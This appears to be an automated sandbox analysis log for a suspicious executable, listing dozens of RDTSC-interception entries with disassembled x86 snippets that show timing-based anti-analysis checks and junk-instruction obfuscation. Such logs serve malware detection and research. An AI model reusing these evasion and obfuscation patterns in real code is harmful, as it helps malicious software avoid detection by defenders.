        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4E05E second address: F4E07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4D65D second address: F4D699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1A521h 0x00000008 js 00007FB8E4E1A516h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jmp 00007FB8E4E1A521h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4D914 second address: F4D918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4D918 second address: F4D91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4D91E second address: F4D93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8E4E1E3BEh 0x0000000d js 00007FB8E4E1E3B6h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4D93A second address: F4D940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4DEB3 second address: F4DEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FB8E4E1E3CFh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FB8E4E1E3C7h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4DEDD second address: F4DEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4DEE5 second address: F4DEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F515C4 second address: F515DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F515DB second address: F51601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C2h 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jbe 00007FB8E4E1E3C4h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F51601 second address: F51622 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FB8E4E1A51Dh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F51622 second address: F5166D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C2h 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FB8E4E1E3B8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 6DE2B523h 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e jl 00007FB8E4E1E3B6h 0x00000034 pop edx 0x00000035 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F51A01 second address: F51A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FB8E4E1A516h 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F51A96 second address: F51A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F51A9F second address: F51AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F51C08 second address: F51C12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5233A second address: F52350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB8E4E1A51Bh 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F52739 second address: F52757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FB8E4E1E3C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F52757 second address: F5275B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5275B second address: F5277B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D2E73h], ebx 0x0000000d mov esi, 1F2717BDh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB8E4E1E3BBh 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5455B second address: F54578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB8E4E1A516h 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F53D2C second address: F53D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FB8E4E1E3B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F54578 second address: F5457C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5461A second address: F5461E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5461E second address: F54622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F54622 second address: F54628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F550D1 second address: F550FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FB8E4E1A516h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FB8E4E1A52Dh 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F550FF second address: F55106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F55B22 second address: F55B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F55B26 second address: F55BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8E4E1E3BBh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB8E4E1E3B8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FB8E4E1E3B8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 jmp 00007FB8E4E1E3C8h 0x0000004a push 00000000h 0x0000004c mov si, dx 0x0000004f call 00007FB8E4E1E3C5h 0x00000054 push edi 0x00000055 jg 00007FB8E4E1E3B6h 0x0000005b pop edi 0x0000005c pop esi 0x0000005d xchg eax, ebx 0x0000005e pushad 0x0000005f jmp 00007FB8E4E1E3C9h 0x00000064 push eax 0x00000065 push edx 0x00000066 push edx 0x00000067 pop edx 0x00000068 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5713B second address: F5713F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5713F second address: F57145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F57145 second address: F571CE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1A522h 0x00000008 jmp 00007FB8E4E1A51Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FB8E4E1A518h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FB8E4E1A518h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 jmp 00007FB8E4E1A527h 0x0000004b push 00000000h 0x0000004d cld 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jno 00007FB8E4E1A516h 0x00000058 jmp 00007FB8E4E1A521h 0x0000005d popad 0x0000005e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F571CE second address: F571E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8E4E1E3B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FB8E4E1E3B6h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5952F second address: F595E4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8E4E1A522h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007FB8E4E1A52Ch 0x00000011 jmp 00007FB8E4E1A526h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FB8E4E1A518h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 stc 0x00000032 sub edi, dword ptr [ebp+1244AC1Ch] 0x00000038 mov dword ptr [ebp+122D1AF7h], edi 0x0000003e push 00000000h 0x00000040 mov ebx, dword ptr [ebp+122D2B9Bh] 0x00000046 mov ebx, dword ptr [ebp+122D29E3h] 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ecx 0x00000051 call 00007FB8E4E1A518h 0x00000056 pop ecx 0x00000057 mov dword ptr [esp+04h], ecx 0x0000005b add dword ptr [esp+04h], 00000019h 0x00000063 inc ecx 0x00000064 push ecx 0x00000065 ret 0x00000066 pop ecx 0x00000067 ret 0x00000068 mov bl, EEh 0x0000006a xchg eax, esi 0x0000006b push esi 0x0000006c jmp 00007FB8E4E1A526h 0x00000071 pop esi 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F595E4 second address: F595E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5B42E second address: F5B47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007FB8E4E1A518h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 mov edi, dword ptr [ebp+122D37B2h] 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a xor dword ptr [ebp+122D2747h], ecx 0x00000030 mov di, 565Ah 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007FB8E4E1A51Dh 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5B47A second address: F5B47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5D3AA second address: F5D3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5E3E5 second address: F5E3EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5E3EB second address: F5E451 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8E4E1A51Ch 0x00000008 jns 00007FB8E4E1A516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 add bx, 1555h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FB8E4E1A518h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D27DEh], edx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007FB8E4E1A518h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov edi, edx 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5E451 second address: F5E455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5E455 second address: F5E45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5F531 second address: F5F547 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FB8E4E1E3B8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5F547 second address: F5F59C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8E4E1A51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FB8E4E1A518h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jns 00007FB8E4E1A51Ch 0x0000002b push 00000000h 0x0000002d mov ebx, 0C96456Dh 0x00000032 push 00000000h 0x00000034 mov edi, 43B8C128h 0x00000039 movzx edi, ax 0x0000003c push eax 0x0000003d push esi 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007FB8E4E1A516h 0x00000046 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5F59C second address: F5F5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F60527 second address: F605B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c jmp 00007FB8E4E1A51Dh 0x00000011 popad 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D2FAEh], ebx 0x00000019 mov ebx, dword ptr [ebp+12464A61h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007FB8E4E1A518h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b mov ebx, eax 0x0000003d mov ebx, eax 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007FB8E4E1A518h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b mov dword ptr [ebp+122D2747h], ecx 0x00000061 xchg eax, esi 0x00000062 push ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FB8E4E1A51Eh 0x0000006a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F605B0 second address: F605D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB8E4E1E3C8h 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F61510 second address: F61526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1A522h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F643FB second address: F6440D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1E3B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB8E4E1E3B6h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F6440D second address: F64411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F649CB second address: F649CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F58484 second address: F5848E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5C5A5 second address: F5C5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5D581 second address: F5D587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5E641 second address: F5E646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F5E646 second address: F5E64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F6267C second address: F62680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F6171C second address: F61737 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB8E4E1A518h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FB8E4E1A528h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FB8E4E1A516h 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F61737 second address: F6173B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F67806 second address: F67822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F66A22 second address: F66A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB8E4E1E3B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F66AD4 second address: F66AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F67A21 second address: F67A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F67A25 second address: F67A32 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F6895E second address: F68A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FB8E4E1E3B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D364Ch], edi 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov bx, cx 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007FB8E4E1E3B8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D1C09h], edx 0x0000005e jmp 00007FB8E4E1E3BBh 0x00000063 mov eax, dword ptr [ebp+122D115Dh] 0x00000069 jnp 00007FB8E4E1E3C8h 0x0000006f push FFFFFFFFh 0x00000071 mov bh, F1h 0x00000073 nop 0x00000074 pushad 0x00000075 jmp 00007FB8E4E1E3C8h 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FB8E4E1E3C9h 0x00000081 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F69A52 second address: F69A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F6F0EB second address: F6F0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F74183 second address: F74193 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FB8E4E1A516h 0x00000010 rdtsc
